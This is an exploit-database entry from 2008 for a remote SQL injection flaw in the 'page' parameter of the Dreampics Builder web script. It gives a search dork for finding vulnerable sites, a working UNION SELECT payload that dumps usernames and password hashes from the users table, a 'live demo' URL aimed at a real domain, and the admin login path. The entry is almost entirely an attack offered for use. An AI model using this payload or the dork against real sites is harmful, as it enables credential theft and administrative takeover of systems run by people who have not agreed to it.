Dreampics Builder (page) Remote SQL Injection Vulnerability

2008-07-09T00:00:00
ID 1337DAY-ID-3377
Type zdt
Reporter Hussin X
Modified 2008-07-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
Dreampics Builder (page) Remote SQL Injection Vulnerability
===========================================================



#########################################################
#
#     PICS BUILDER (page) SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#=========================================================    
#
#    script :  http://www.dreamlevels.com/dreampics.php
#
#    DorK   :   powered by Dreampics Builder
#     
##########################################################

Exploit: 

www.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--


L!VE DEMO:

http://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--


Admin Login :

/admin/



#  0day.today [2017-12-31]  #